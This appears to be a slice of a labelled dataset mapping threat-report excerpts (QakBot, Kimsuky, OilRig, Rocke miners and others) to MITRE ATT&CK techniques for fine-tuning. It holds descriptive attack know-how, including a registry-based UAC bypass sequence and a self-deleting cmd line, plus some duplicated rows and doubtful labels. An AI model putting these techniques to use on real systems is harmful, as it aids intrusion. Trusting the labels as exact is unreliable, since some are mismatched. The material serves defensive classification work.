| 691 | The threat actors used Windows’ scheduled task and batch scripts to execute “scr.exe” and collect additional information from hosts on the network. The tool “scr.exe” is a screenshot utility that the threat actor used to capture the screen of systems across the network. The MD5 hash of “scr.exe” matched the MD5 of ScreenUtil, as reported in the Symantec Dragonfly 2.0 report | ['T1059.003 - Command and Scripting Interpreter: Windows Command Shell', 'T1113 - Screen Capture'] | fine_tune |
| 692 | Finally, the script stores the encrypted payload in the Windows registry. Note that the attackers seem to use a different registry location per organization. Thus, it is not a useful indicator to detect similar intrusions | ['T1112 - Modify Registry'] | fine_tune |
| 693 | HyperStack uses named pipes to execute remote procedure calls (RPC) from the controller to the device hosting the HyperStack client. To move laterally, the implant tries to connect to another remote device’s IPC$ share, either using a null session or default credentials. IPC$ is a share that facilitates inter-process communication (IPC) by exposing named pipes to write to or read from. If the implant’s connection to the IPC$ is successful, the implant can forward RPC commands from the controller to the remote device, and likely has the capability to copy itself onto the remote device | ['T1559 - Inter-Process Communication', 'T1078.001 - Valid Accounts: Default Accounts'] | fine_tune |
| 694 | At the time of discovery TEARDROP was a novel concoction: never-before-seen, possibly even tailor-made for this attack. TEARDROP runs in-memory but it does register a Windows service, which involves editing the registry | ['T1112 - Modify Registry'] | fine_tune |
| 695 | Hooking module – hooks a hardcoded set of WinAPI and (if they exist) Mozilla DLL Hooking is used to perform web injects, sniff traffic and keyboard data and even prevent DNS resolution of certain domains. Hooking works in the following way: QakBot injects a hooking module into the appropriate process, the module finds functions from the hardcoded set and modifies the functions so they jump to custom code | ['T1055 - Process Injection'] | fine_tune |
| 696 | Curiously, the same private session key is also encrypted with another public key hardcoded into the body of the Trojan, regardless of the configuration. It turns out that someone who knows the private key corresponding to the public skeleton key is able to decrypt the victim’s files, even without the private key for sub_key. It seems like the Trojan developers built a loophole into the algorithm allowing them to decrypt files behind the distributors’ back | ['T1486 - Data Encrypted for Impact'] | fine_tune |
| 697 | The APT group has used web hosting credentials—stolen from victims outside of their usual targets—to host their malicious scripts and tools. Kimsuky likely obtained the credentials from the victims via spearphishing and credential harvesting scripts. On the victim domains, they have created subdomains mimicking legitimate sites and services they are spoofing, such as Google or Yahoo mail. 14] - Kimsuky has also sent benign emails to targets, which were possibly intended to build trust in advance of a follow-on email with a malicious attachment or link. Posing as South Korean reporters, Kimsuky exchanged several benign interview-themed emails with their intended target to ostensibly arrange an interview date and possibly build rapport. The APT group invited the targets to a Skype interview on the topic of inter-Korean issues and denuclearization negotiations on the Korean Peninsula. Posing as South Korean reporters, Kimsuky exchanged several benign interview-themed emails with their intended target to ostensibly arrange an interview date and possibly build rapport. After a recipient agreed to an interview, Kimsuky sent a subsequent email with a malicious document, either as an attachment or as a Google Drive link within the body. The document usually contained a variant of BabyShark malware (see the Execution section for information on BabyShark). When the date of the interview drew near, Kimsuky sent an email canceling the interview. Kimsuky tailors its spearphishing and social engineering approaches to use topics relevant to the target, such as COVID-19, the North Korean nuclear program, or media interviews | ['T1583.001 - Domains'] | fine_tune |
| 698 | In the newer attack flows we observed, we once again found valid Certum certificates were used to sign the Bandook malware executable | ['T1553.002 - Code Signing'] | fine_tune |
| 699 | The latter does not use libcurl anymore and now uses winhttp to perform all requests to C2. The usage of the HKCU\Software\Microsoft\Windows\CurrentVersion\Run registry key has a persistence mechanism that has been replaced by the creation of a service. The C2 path pattern has also changed, we have identified the following paths: ini.php, info.php and parse_ini_file.php, which are no longer random nor animal named based | ['T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'] | fine_tune |
| 700 | For the first time, the Bisonal developers decided to use a packer: MPRESS. The Bisonal string also disappears from the binary however the workflow of the malware stays the same and some features are copy/pasted from the previous Bisonal variant | ['T1027.002 - Obfuscated Files or Information: Software Packing'] | fine_tune |
| 701 | Throughout the spear-phishing campaign, the threat actors used email attachments to leverage legitimate Microsoft Office functions for retrieving a document from a remote server using the Server Message Block (SMB) protocol. Note: transfer of credentials can occur even if the file is not retrieved. After obtaining a credential hash, the threat actors can use password-cracking techniques to obtain the plaintext password. With valid credentials, the threat actors are able to masquerade as authorized users in environments that use single-factor authentication | ['T1078 - Valid Accounts'] | fine_tune |
| 702 | The emails first originated from a spoofed sender that impersonated a Meetings Services Assistant at the United Nations General Assembly Secretariat. The threat actor achieved this impersonation by utilizing the legitimate email marketing service SMTP2Go, which allows users to alter the envelope sender field while using a unique sender address generated by the service | ['T1585.002 - Email Accounts'] | fine_tune |
| 703 | The new spear-phishing docs used by MuddyWater rely on social engineering to persuade users to enable macros. The attackers rely on a range of compromised hosts to deliver their attacks | ['T1566.001 - Phishing: Spearphishing Attachment'] | fine_tune |
| 704 | FANCY BEAR adversary used different tradecraft, deploying X-Agent malware with capabilities to do remote command execution, file transmission and keylogging | ['T1105 - Ingress Tool Transfer'] | fine_tune |
| 705 | The next program sent to victims enumerates all the drives on the infected system and executes the following command on them | ['T1083 - File and Directory Discovery'] | fine_tune |
| 706 | Once explorer.exe is running, the service configures the environment and executes the C2 contact module: winprint32.exe. This module is responsible for launching the document search module, contact the C2 and exfiltrate the collected documents | ['T1020 - Automated Exfiltration', 'T1041 - Exfiltration Over C2 Channel'] | fine_tune |
| 707 | To initially gain access to the environment, Managed Defense analysts identified that FIN6 compromised an internet facing system. Following the compromise of this system, analysts identified FIN6 leveraged stolen credentials to move laterally within the environment using the Windows’ Remote Desktop Protocol (RDP | ['T1003.001 - OS Credential Dumping: LSASS Memory', 'T1021.001 - Remote Services: Remote Desktop Protocol', 'T1078 - Valid Accounts'] | fine_tune |
| 708 | Use of Open Source Tools In an attempt to avoid detection and as an anti-analysis tactic, the OilRig group abused an open source tool called Invoke-Obfuscation to obfuscate the code used for QUADAGENT. Invoke-Obfuscation is freely available via a Github repository and allows a user to change the visual representation of a PowerShell script simply by selecting the desired obfuscation techniques. Invoke-Obfuscation offers a variety of obfuscation techniques, and by analyzing the script we were able to ascertain the specific options in this attack. After identifying the specific options used to obfuscate QUADAGENT, we were able to deobfuscate the PowerShell script and perform additional analysis. We found two obfuscation techniques applied to the script: the first one changing the representation of variables; the second one changing the representation of strings in the script. Invoke-Obfuscation calls the string obfuscation used by the actors to further obfuscate this script Reorder, which uses the string formatting functionality within PowerShell to reconstruct strings from out of order substrings (ex. 1}{0}" -f 'bar','foo'). During our analysis, we installed Invoke-Obfuscation and used it to obfuscate a previously collected QUADAGENT sample to confirm our analysis. We captured the commands we ran in Invoke-Obfuscation in the animation in Figure 3 below, which visualizes the steps the threat actor may have taken to create the payload delivered in this attack | ['T1059.003 - Command and Scripting Interpreter: Windows Command Shell'] | fine_tune |
| 709 | The purpose of this tool is to parse the hard drive for files with a specific extension and create an archive with these files. Afterward, the module will delete old "sft" files assuming they were already exfiltrated. After a pause of 6,500 milliseconds, it will start its search for the targeted files. SFT file creation routine Using the working directory as a base path, which in this sample case is C:\DOCUME~1\<USER>~1\LOCALS~1\Temp\4CA-B25C11-A27BC\, each selected file will be compressed into the file kr.zp | ['T1083 - File and Directory Discovery'] | fine_tune |
| 710 | Cookie Notice . This website uses cookies to help personalize and improve your experience. By Continuing to use this site, you are consenting to the use of cookies. Further research into the IP address hosting the spoofed page revealed a broader campaign to steal credentials. Countries with targeted universities. Source: Secureworks) . After entering their credentials into the fake login page, victims were redirected to the legitimate website where they were automatically logged into a valid session or were prompted to enter their credentials again. Numerous spoofed domains referenced the targeted universities' online library systems, indicating the threat actors' intent to gain access to these resources. CTU™ researchers were unable to confirm functionality of all identified spoofed pages because some of the domains were not accessible at the time of analysis. Domain registrations indicate the infrastructure to support this campaign was still being created when CTU researchers discovered the activity. A domain registered in May 2018 also contained subdomains spoofing university targets. These subdomains redirected visitors to spoofed login pages on other attacker-controlled domains | ['T1583.001 - Domains'] | fine_tune |
| 711 | T1566.001: Spearphishing Attachment - T1566.002: Spearphishing Link - T1566.003: Spearphishing via Service - - - T1204.001: Malicious Link - T1204.002: Malicious File - T1059: Command and Scripting Interpreter T1059.005: Visual Basic - T1059.005: Visual Basic - - T1053.005: Scheduled Task - T1129: Shared Modules - T1106: Native API - T1047: Windows Management Instrumentation - - T1027: Obfuscated Files or Information T1027.002: Software Packing - T1027.002: Software Packing - T1553: Subvert Trust Controls T1553.002: Code Signing - T1553.002: Code Signing - T1218: Signed Binary Proxy Execution T1218.010: Regsvr32 - T1218.010: Regsvr32 - - T1497.001: System Checks - T1497.002: User Activity Based Checks - T1497.003: Time Based Evasion - T1112: Modify Registry - T1070: Indicator Removal on Host T1070.004: File Deletion - T1070.004: File Deletion - T1140: De-obfuscate/Decode Files or Information - - - T1090.003: Multi-hop Proxy - T1105: Ingress Tool Transfer - - T1055: Process Injection T1055.012: Process Hollowing - T1055.012: Process Hollowing - - T1082: System Information Discovery - T1049: System Network Connections Discovery - T1016: System Network Configuration Discovery - T1057: Process Discovery - T1033: System Owner/User Discovery - T1518: Software Discovery T1518.001: Security Software Discovery - T1518.001: Security Software Discovery - Persistence T1546: Event Triggered Execution T1547: Boot or Logon Autostart Execution T1547.001: Registry Run Keys / Startup Folder - T1546: Event Triggered Execution - T1547: Boot or Logon Autostart Execution T1547.001: Registry Run Keys / Startup Folder - T1547.001: Registry Run Keys / Startup Folder | ['T1070.004 - Indicator Removal on Host: File Deletion'] | fine_tune |
| 712 | After the execution of rundll32.exe, the PowerShell script enu.ps1 is executed. This script is encoded with Base64 in order to avoid detection by antivirus products | ['T1027 - Obfuscated Files or Information'] | fine_tune |
| 713 | Config.json" is a mining config file for XMRig, an open-source Monero miner. The file sets the mining pool as xmr[.]pool[.]MinerGate[.]com:45700 and the actor's wallet as rocke@live.cn. This configuration file contains the same actor pool and wallet information as the first. If the shell scripts do not download a miner from 118[.]24[.]150[.]172, they attempt to download a file called "XbashY" from 3g2upl4pq6kufc4m[.]tk. TermsHost.exe" is a PE32 Monero miner. Based on the config file it uses, it appears to be the Monero Silent Miner. This miner can be purchased online for $14 and targets malicious actors. Advertising for the miner promotes it as offering startup registry key persistence, mining only while idle, and the ability to inject the miner into "Windows processes to bypass firewalls. The sample grabs the config file "xmr.txt," which contains the same configuration information as the previous files, from Rocke's command and control (C2) server hosted on sydwzl[.]cn. The sample also creates the UPX-packed file "dDNLQrsBUE.url" in the Windows Start Menu Folder | ['T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'] | fine_tune |
| 714 | Config.json" is a mining config file for XMRig, an open-source Monero miner. The file sets the mining pool as xmr[.]pool[.]MinerGate[.]com:45700 and the actor's wallet as rocke@live.cn. If the shell scripts do not download a miner from 118[.]24[.]150[.]172, they attempt to download a file called "XbashY" from 3g2upl4pq6kufc4m[.]tk. TermsHost.exe" is a PE32 Monero miner. Based on the config file it uses, it appears to be the Monero Silent Miner. This miner can be purchased online for $14 and targets malicious actors. Advertising for the miner promotes it as offering startup registry key persistence, mining only while idle, and the ability to inject the miner into "Windows processes to bypass firewalls. The sample grabs the config file "xmr.txt," which contains the same configuration information as the previous files, from Rocke's command and control (C2) server hosted on sydwzl[.]cn. The sample also creates the UPX-packed file "dDNLQrsBUE.url" in the Windows Start Menu Folder. Intriguingly, this file appears to share some similarities with Cobalt Strike, the popular penetration testing software, which would allow the attacker to have greater control over the infected system | ['T1027.002 - Obfuscated Files or Information: Software Packing'] | fine_tune |
| 715 | The ROKRAT author implements several techniques typically seen to frustrate human analysts and avoid sandbox execution. First, the malware does not run on Windows XP systems. The code used to perform this task: The malware checks the process names in use on the victim machine. It compares if the executed process name matches a partial name hardcoded in the sample. Here is the complete list | ['T1057 - Process Discovery'] | fine_tune |
| 716 | In this version, a shortcut is created in order to launch winnit.exe in the following path %USERPROFILE%\Start Menu\Programs\Startup\Anti virus service.lnk. As in the previous version, the ID of the infected system is generated with exactly the same method. The C2 is different and the analysed version this time only contains a single domain | ['T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'] | fine_tune |
| 717 | If yes, it generates an RSA PKCS key using CryptGenKey that is used for encryption of communication session keys. It then writes the RSA key to the PRVK key in the [Version] section of the config file. Turla’s Carbon backdoor also implements RSA encryption on the session keys for some of its C&C channels | ['T1573.002 - Asymmetric Cryptography'] | fine_tune |
| 718 | root/.ssh/{id_rsa, id_rsa.pub} – the SSH pair key used to update the miner from the C&C server using SCP. opt/{bootsync.sh, bootlocal.sh} – the system startup commands that try to update the miner from the C&C server and run it (see Scripts 7 and 8 | ['T1105 - Ingress Tool Transfer'] | fine_tune |
| 719 | Daserf — This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. It uses RC4 encryption and custom Base64 encoding to obfuscate HTTP traffic. Datper uses an RC4-encrypted configuration to obfuscate HTTP traffic. xxmm (also known as Minzen) — This RAT and likely successor to Daserf AES-encrypts HTTP communications using a one-time encryption key. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. T-SMB Scan — This SMB scanning tool was originally published on a Chinese program-sharing website (pudn.com). BRONZE BUTLER removed its help message functionality. Use malware to upload the large list of enumerated files to the C2 server. Use downloaders or other malware to send the new list to a compromised host. Use an uploader or other malware to send the archived files to an attacker-controlled server. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity | ['T1071.001 - Application Layer Protocol: Web Protocols'] | fine_tune |
| 720 | Hardcore Nationalist group SideWinder is a threat group active since 2012 according to Kaspersky. This group mainly targets Pakistanis and Chinese military & government entities’ windows machines. They also target mobile phone devices. This is the second time this group is using COVID-19 theme to lure victims, thereby capitalizing on the fear of global pandemic. Sidewinder aka HN2 is believed to be an Indian state sponsored group. A detailed analysis of SideWinder attacks on Pakistani military officials was also published in April | ['T1204.002 - User Execution: Malicious File', 'T1204.001 - Malicious Link'] | fine_tune |
| 721 | The SolarWinds Orion API is vulnerable to authentication bypass that could allow a remote attacker to execute API commands | ['T1203 - Exploitation for Client Execution'] | fine_tune |
| 722 | Grandoreiro’s DGA uses two strings (prefix and suffix) hardcoded in the binary and the local date as inputs. Note that based on the DGA, a different website is required for each day. We have observed some variants also using a custom base64 alphabet | ['T1568.002 - Domain Generation Algorithms'] | fine_tune |
| 723 | WastedLocker will attempt to encrypt files on local as well as remote (network adjacent and accessible) and removable drives | ['T1135 - Network Share Discovery'] | fine_tune |
| 724 | The infection chain starts with an email in which the victim receives a download link that fetches the first-stage downloader. As we found in our analysis, this first-stage downloader is responsible for fetching a malicious MSI file hosted on an attacker-controlled GitHub page. This MSI file is downloaded and executed on the endpoint. As a result, a malicious Python-compiled binary is dropped on the file system, which uses the Dropbox API for command-and-control (C&C) communication | ['T1566.002 - Phishing: Spearphishing Link', 'T1105 - Ingress Tool Transfer', 'T1102.002 - Bidirectional Communication', 'T1204.001 - Malicious Link'] | fine_tune |
| 725 | At the second stage, the attackers remotely connected to the device and scanned the local network seeking to gain access to public shared folders, web servers, and any other open resources. The aim was to harvest information about the network, above all, servers and workstations used for making payments. At the same time, the attackers tried to brute-force or sniff login data for such machines. If the firewall blocked access from one segment of the network to another, but allowed a reverse connection, the attackers used a different payload to build tunnels | ['T1040 - Network Sniffing'] | fine_tune |
| 726 | As a result of all of the above actions, when attempting to surf the web, the user’s web browser will first ask the attacker web page on TOR for proxy settings. The user traffic is then redirected through a proxy controlled by the attacker, who carries out a Man-In-the-Middle attack and impersonates the various sites the user attempts to surf. The attacker is free to read the victim’s traffic and tamper with it in any way they please | ['T1557 - Adversary-in-the-Middle'] | fine_tune |
| 727 | After execution, Ragnar Locker Ransomware encrypts the files and adds the extension “.ragnar” and an 8 digit number | ['T1486 - Data Encrypted for Impact'] | fine_tune |
| 728 | When referring to additional plugins, it is worth noting that in early versions of Valak the plugins were downloaded by the second stage JS via PowerShell. More recent versions of Valak abandoned the popular yet easily detectable PowerShell downloader approach and transitioned to PluginHost as a means of managing and downloading additional payloads. This transition indicates that the Valak authors are looking for stealthier approaches and ways to improve their evasion techniques | ['T1059.001 - Command and Scripting Interpreter: PowerShell'] | fine_tune |
| 729 | Controlled by Micropsia operators, the malware is able to register to an event of USB volume insertion to detect new connected USB flash drives. Once an event is triggered, Micropsia executes an RAR tool to recursively archive files based on a predefined list of file extensions (*.xls, *.xlsx, *.csv, *.odt, *.doc, *.docx, *.ppt, *.pptx, *.pdf, *.mdb, *.accdb, *.accde, *.txt | ['T1560.001 - Archive Collected Data: Archive via Utility', 'T1119 - Automated Collection'] | fine_tune |
| 730 | We were able to source a sample that may be the malware involved in the May 2018 attacks. We ran it, and it broke the boot sector as expected (see Figure 1). An initial analysis of the file revealed it was created using Nullsoft Scriptable Install System (NSIS), an open-source application used to create setup programs. The actor behind this threat used the application and purposely named it “MBR Killer. There are no indications of network-related behavior in this malware | ['T1027 - Obfuscated Files or Information'] | fine_tune |
| 731 | In some attacks, Whitefly has used a second piece of custom malware, Trojan.Nibatad. Like Vcrodat, Nibatad is also a loader that leverages search order hijacking, and downloads an encrypted payload to the infected computer. And similar to Vcrodat, the Nibatad payload is designed to facilitate information theft from an infected computer | ['T1027 - Obfuscated Files or Information'] | fine_tune |
| 732 | Creates a new registry key HKCU\Software\Classes\Folder\shell\open\command - Sets the “Default” value to “path of the malware” - Creates a value “DelegateExecute” and sets the value to “0” - Executes %systemDirectory%sdclt.exe to bypass the UAC as shown below (figure 7 | ['T1112 - Modify Registry'] | fine_tune |
| 733 | These two files, keyword_parm.txt and parm.txt contain instructions for MESSAGETAP to target and save contents of SMS messages | ['T1560.003 - Archive via Custom Method'] | fine_tune |
| 734 | 1) Send initial proxy module request. The initial request contains the bot ID, external IP address of the infected machine, reverse DNS lookup of the external IP address, internet speed (measured earlier) and seconds since the proxy module started. 2) Establish a connection (proxy commands sequence 1->10->11) with the PROXY-C2. 3) Initialize sessions, perform socks5 authorization with login/password (received from PROXY-C2 with command 10). 4) Begin SOCKS5-like communication wrapped into the QakBot proxy module protocol | ['T1090.002 - External Proxy'] | fine_tune |
| 735 | A technical relevant fact about this campaign is the use of Python embedded into Windows executables of the malware. There is no multi-platform support as the code is heavily Windows-oriented (use of libraries). However, we discovered several clues that the attackers prepared the infrastructure for Mac OS X and Unix victims as well. In addition to Windows components, we also found a mobile (Android) component | ['T1053.005 - Scheduled Task/Job: Scheduled Task', 'T1059.006 - Command and Scripting Interpreter: Python'] | fine_tune |
| 736 | The second version does not carry the payload directly but instead downloads it from a C2 into the same location as before. The C2 server address is embedded in the main executable in the TinkaOTP bundle. The hardcoded download and execution code are easily visible as they are unencrypted, plain UTF strings in the binary | ['T1105 - Ingress Tool Transfer'] | fine_tune |
| 737 | Guloader is a downloader that has been active since 2019. It is known to deliver various malware, more notably: Agent-Tesla, Netwire, FormBook, Nanocore, and Parallax RAT | ['T1102 - Web Service'] | fine_tune |
| 738 | All of the backdoors identified – excluding RoyalDNS – required APT15 to create batch scripts in order to install its persistence mechanism. This was achieved through the use of a simple Windows run key | ['T1059.003 - Command and Scripting Interpreter: Windows Command Shell'] | fine_tune |
| 739 | Once communication with the C2 server has been established, QakBot is known to download and use additional modules in order to perform its malicious operations | ['T1095 - Non-Application Layer Protocol', 'T1105 - Ingress Tool Transfer'] | fine_tune |
| 740 | This DLL has no other noticeable characteristics, as it functions like a typical malicious sideload. After loading the encrypted payload in memory, it transfers the execution to a shellcode that is located at the beginning of the file. Once loaded in memory, the ZeroT shellcode does not present any kind of obfuscation, unlike that for PlugX. As in the new PlugX dropper detailed below, this is done using RC4 and RtlDecompressBuffer. As in PlugX samples, the PE header of ZeroT has been tampered with, specifically the “MZ” and “PE” constants (Fig | ['T1574.002 - Hijack Execution Flow: DLL Side-Loading'] | fine_tune |
| 741 | One legitimate executable, sometimes signed, and vulnerable to dynamic-link library (DLL) sideloading - One malicious DLL loaded by the legitimate file - One binary file usually containing obfuscated code, unpacked in memory by the malicious DLL | ['T1574.002 - Hijack Execution Flow: DLL Side-Loading', 'T1574.002 - Hijack Execution Flow: DLL Side-Loading', 'T1574.002 - Hijack Execution Flow: DLL Side-Loading'] | fine_tune |
| 742 | The `Download3rdStage` will first decode `https://discord.com` and try to connect to it. Then, it performs a time-based anti-debug check, as shown in the code below. If any of these checks fail, the DLL will not download the third stage | ['T1497.003 - Time Based Evasion'] | fine_tune |
| 743 | Learn more about our Personal Data Protection PolicyAccept Cookies . DeepMalwareAnalysis . Joe Security's Blog . TrickBot's new API-Hammering explained . Published on: 13.07.2020 As usual, at Joe Security, we keep a close eye on evasive malware. It turned out to be a new TrickBot sample using API hammering to bypass analysis. Two Stage API Hammering . Right after the entry point, the sample tries to load taskmgr.exe as a DLL: This is likely a trick to bypass emulators that do not check if a given DLL exists if LoadLibraryEx is called. Since before the loop FreeConsole has been called all printf calls do basically nothing: This code has been directly copied from the documentation of printf: So what is the purpose of those numerous printf loops. As a result, the massive amount of calls delay the execution process and overload the sandbox with junk data. This behavior is called API Hammering. API Hammering is not a new technique, we have already seen it several years ago e.g. Joe Sandbox detects the API hammering successfully and rates it as malicious: Right after the printf flood, the sample performs another loop to delay execution by creating and writing to a temporary file - the second stage. In between it performs random sleeps: Again, the purpose is to overload the sandbox and delay the execution. No matter what technology your favorite sandbox uses, it has to handle API Hammering correctly | ['T1106 - Native API'] | fine_tune |
| 744 | When generating the URLs within the HTTP POST and GET requests, XAgent sets one HTTP parameter using a specific data structure that contains this agent_id value. This parameter transmits the agent_id to the C2 server to obtain commands the actor wishes to execute on the compromised system. The data structure used to transmit the agent_id to the C2 is as follows | ['T1106 - Native API'] | fine_tune |
| 745 | Inception’s malware is modular and the attackers will load plugins based on requirements for each attack. The group has used a range of plugins in recent attacks, some of which are improved versions of plugins used in 2014, while others were previously unseen | ['T1057 - Process Discovery'] | fine_tune |
| 746 | When running under a limited UAC account, the installer extracts d3d9.dll and creates a persistence key under HKCU\Software\Microsoft\Windows\Run | ['T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'] | fine_tune |
| 747 | The process begins with the consistent execution of a malicious DLL using the legitimate regsvr32.exe Windows Utility. Once executed, the DLL is deleted from the system and its components are dropped to the system | ['T1218.010 - Signed Binary Proxy Execution: Regsvr32'] | fine_tune |
| 748 | Following the initial compromise, in many instances the BackdoorDiplomacy group employed open-source reconnaissance and red-team tools to evaluate the environment for additional targets of opportunity and lateral movement. Among the tools documented are | ['T1105 - Ingress Tool Transfer', 'T1588.002 - Tool'] | fine_tune |
| 749 | Once the library is called by one of the triggering events implemented in its code, it reads a configuration file from a shared Google Document. If it is not able to connect to the address, it uses a hardcoded one | ['T1565.002 - Transmitted Data Manipulation'] | fine_tune |
| 750 | Hildegard uses LD_PRELOAD to hide the malicious process launched inside the containers. The malware modified the /etc/ld.so.preload file to intercept shared libraries’ imported functions | ['T1574.006 - Hijack Execution Flow: LD_PRELOAD'] | fine_tune |
| 751 | The threat actor connected via Remote Desktop from a Domain Controller to a vCenter server and opened a PowerShell console, then used the PowerShell command -ep bypass to circumvent the execution policy. Using the Windows Azure Active Directory PowerShell Module, the threat actor connected to the victim’s O365 tenant and began performing enumeration queries | ['T1087.002 - Account Discovery: Domain Account', 'T1482 - Domain Trust Discovery'] | fine_tune |
| 752 | Targets are sent spear phishing e-mails that lead them to a web site displaying a lure document and are immediately prompted to install a malicious Google Chrome extension. It then redirects the user to install a “Font Manager” extension from the Chrome Web Store, as seen in Figure 2. Figure 2: HTML Source of Phishing Page The malicious extensions, now removed from the Chrome Web Store, contain reviews left by the threat actor using compromised Google+ accounts. It should be noted however, that some users reported deleting the extension immediately because it prevented the Chrome browser from functioning properly. The malicious Chrome extensions declare permissions to run on every URL in the browser, as seen in Figure 3. Loading jQuery.js from an external site makes no sense, since the latest version of extension has a legitimate jQuery.js included in the extension bundle. Figure 4: Given the threat actor’s propensity for password theft, and the fact that the malicious Chrome extensions were situated to read data from every website, it's likely that the intent is to steal browser cookies and passwords. Figure 5: Certificate used to sign MECHANICAL/GREASE While the threat actors did use a few tools to automate intrusions, we also found a ZIP archive of tools that demonstrate their propensity for password theft to propagate. Advise users to be wary of any prompts to install browser extensions, even if they are hosted on an official extension site. They spent significant time and resources doing reconnaissance on their targets, as evidenced by the comments left on the Chrome extension page | ['T1176 - Browser Extensions'] | fine_tune |
| 753 | After the payload execution it reaches out to the C2 via POST request as shown below | ['T1071.001 - Application Layer Protocol: Web Protocols'] | fine_tune |
| 754 | All RDAT samples have malicious verdicts in WildFire and have protections in place through Cortex XDR. DNS tunneling protocols used for C2 communications are blocked via DNS Security. All C2 domains are classified as Command-and-Control for URL Filtering. AutoFocus customers can monitor activity via the rdat_backdoor tag | ['T1132.002 - Non-Standard Encoding', 'T1132.001 - Data Encoding: Standard Encoding'] | fine_tune |
| 755 | Endpoint Protection . The Trojan.Hydraq Incident . It has been about a week since news of the mysterious Hydraq Trojan (also known as Aurora) attack broke with the unveiling of a threat by Google to pull its operations out of China. In addition the blog also mentioned that a host of other large corporations were also targets of this same attack. In this attack a PDF file was used to exploit the Adobe Acrobat, Reader, and Flash Player Remote Code Execution Vulnerability (CVE-2009-1862/BID35759). This PDF installed a Trojan horse which was an earlier version of the current Trojan.Hydraq. Considering the efforts that the attackers put into staging the attack as a whole, the end malware is not so sophisticated. Download a remote file, save it as %Temp%\mdm.exe, and then execute it. This means the remote attacker has the ability to see in real time any user interface activity as if they were sitting right next to the user. As described in the previously posted blog (Hydraq - An Attack of Mythical Proportions), an unpatched Internet Explorer vulnerability (BID 37815) was used as one of the propagation vectors for this particular Trojan.Hydraq attack. This security hole allows remote exploitation, which means that attackers can run any malicious code of their liking on a victim’s machine by taking advantage of the vulnerability. Prevention & Mitigation Trojan.Hydraq has been known to be spread through specially crafted PDF files and also through malicious Web sites. The attacker can exploit this issue by supplying a malicious Flash ('.swf') file or by embedding a malicious Flash application in a PDF file | ['T1105 - Ingress Tool Transfer'] | fine_tune |
| 756 | We mentioned earlier that docx files (like xlsx and pptx) are part of the OOXML standard. The document defining this standard[6], describes the syntax and values that can be used as an example. An interesting file to look at is the ‘settings.xml’ file that can be discovered in the ‘Word’ container of the docx zip file. This file contains settings with regards to language, markup and more. First, we extracted all the data from the settings.xml files and started to compare. All the documents below contained the same language values | ['T1221 - Template Injection'] | fine_tune |
| 757 | FireEye has dubbed the cybercrime gang FIN5. One of the most unique things about FIN5 is that in every intrusion we responded to where FIN5 has been active, legitimate access was identified. They had valid user credentials to remotely log into the network," said Barry Vengerik, principal threat analyst at FireEye. No sexy zero-days, no remote exploits -- not even spearphishing | ['T1110 - Brute Force'] | fine_tune |
| 758 | It looks like GrowlHelper creates an executable named Software Update Check when it thinks it’s online. I was pretty excited when I first found this, but quickly realized it just drops a copy of itself with a different name | ['T1036.004 - Masquerading: Masquerade Task or Service'] | fine_tune |
| 759 | FireEye assesses APT33 may be behind a series of intrusions and attempted intrusions within the engineering industry. FireEye's Managed Defense has responded to and contained numerous intrusions that we assess are related. The actor is leveraging publicly available tools in early phases of the intrusion; however, we have observed them transition to custom implants in later stage activity in an attempt to circumvent our detection | ['T1555 - Credentials from Password Stores', 'T1003.001 - OS Credential Dumping: LSASS Memory', 'T1552.001 - Unsecured Credentials: Credentials In Files', 'T1003.005 - OS Credential Dumping: Cached Domain Credentials', 'T1555.003 - Credentials from Password Stores: Credentials from Web Browsers', 'T1552.006 - Unsecured Credentials: Group Policy Preferences', 'T1003.004 - OS Credential Dumping: LSA Secrets', 'T1588.002 - Tool'] | fine_tune |
| 760 | PowerPunch also provides an excellent example of this. The key is applied to an executable payload downloaded directly from adversary infrastructure, allowing for an encryption key unique to the target host (highlighted variables names were changed for clarity | ['T1105 - Ingress Tool Transfer'] | fine_tune |
| 761 | The attackers manually send a command to the JS or C# component to drop and execute a batch file from one of their servers. That batch file writes a malicious INF file and supplies it as a parameter to the Microsoft utility cmstp.exe, which executes a remote scriptlet specified in the INF file. This technique has been documented in the MITRE ATT&CK knowledge base as CMSTP; an example of how this technique is used may be found here. This technique has been used in the past by Cobalt, another financially motivated group. The remote scriptlet contains obfuscated JS code that drops an OCX file and executes it via regsvr32.exe | ['T1059.007 - Command and Scripting Interpreter: JavaScript'] | fine_tune |
| 762 | cmd.exe /C choice /C Y /N /D Y /T 2 & Del After sleeping, the Trojan will create a GUID and write it to %APPDATA%\Windows\GDI.bin. It then moves itself to %APPDATA%\Windows\WindowsImplantment.exe and sets both of these files to have the hidden and system flags to hide them from the user. With the Trojan moved its final location, it will then create a scheduled task to run a VBScript to make sure it runs persistently. This differs from the previous OopsIE variant that used a hardcoded task name for the scheduled task. This process ultimately attempts to run the Trojan every three minutes, which is important as OopsIE relies on this scheduled task as it does not include a main loop to continue its execution. After creating this scheduled task for persistence, the Trojan will begin communicating with its C2 server. The process in which the Trojan communicates with its C2 server is very similar to the previous OopsIE Trojan that we discussed in our previous blog. Also, the oops string used to signify and erroneous transmission from the C2, which gave OopsIE its name is reversed to spoo. hex(STDOUT of whoami command)> If the C2 server wishes to send a command, it will respond to the beacon above by echoing the whoami command results sent by the Trojan to the C2 in the URL. The command handler in this OopsIE variant is very similar to the previous version, as it contains the same three (1, 2 and 3) commands seen in Table 2 | ['T1105 - Ingress Tool Transfer'] | fine_tune |
